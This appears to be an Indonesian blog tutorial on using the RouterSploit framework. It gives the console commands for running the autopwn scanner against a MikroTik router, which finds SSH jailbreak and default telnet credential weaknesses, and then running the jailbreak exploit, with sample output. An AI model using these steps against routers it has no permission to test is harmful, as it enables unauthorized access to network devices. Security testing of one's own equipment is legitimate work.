Assalamu’alikum wr.wb
Selamat malam gess, RouterSploit adalah tool yang berguna untuk melakukan eksploit dan mencari celah keamanan pada router.
Beberapa fitur Routersploit antara lain :
- exploits
- creds
- scanners
- payloads
- generic
Untuk menginstall RouterSploit silahkan baca di sini https://github.com/threat9/routersploit .
Cara menggunakan RouterSploit :
- Masuk ke direktori routersploit root@blitsec:/home/akeno/snow# cd routersploit
- Jalankan routersploit dengan perintah root@blitsec:/home/akeno/snow/routersploit# python3 rsf.py
- Jalankan perintah rsf > use scanners/autopwn
- Pada artikel ini saya menggunakan routerOS Mikrotik .
- Setting ip target rsf (AutoPwn) > set target 192.168.xx.xx #enter
- Jika sudah gunakan perintah run untuk memulai eksploit rsf (AutoPwn) > run
- Disini ditemukan 2 vuln
- [+] 192.168.xx.xx:22 ssh exploits/routers/mikrotik/routeros_jailbreak is vulnerable
- [+] 192.168.xx.xx:23 telnet creds/generic/telnet_default is vulnerable
- Cara menggunakannya dengan perintah rsf (AutoPwn) > use exploits/routers/mikrotik/routeros_jailbreak
- Untuk melihat opsi yang dapat di gunakan, kita dapat menggunakan perintah rsf (Mikrotik RouterOS Jailbreak) > show options
- Kemudian set target kemudian check dan silahkan di run
-
rsf (Mikrotik RouterOS Jailbreak) > set target 192.168.xx.xx
[+] target => 192.168.xx.xx
rsf (Mikrotik RouterOS Jailbreak) > check
[+] Target is vulnerable
rsf (Mikrotik RouterOS Jailbreak) > run
[*] Running module…
[+] Target seems to be vulnerable
Sekian artikel kali ini silahkan di lanjut otak atiknya gess, semoga artikel ini bermanfaat.
Jadilah pembaca yang pintar dengan tidak melakukan COPAS artikel,
Wassalamu’alaikum wr.wb
sumber :
https://github.com/threat9/routersploit
https://rixzaldi.wordpress.com/2017/01/01/exploit-router-dengan-routersploit/
MasGombloh 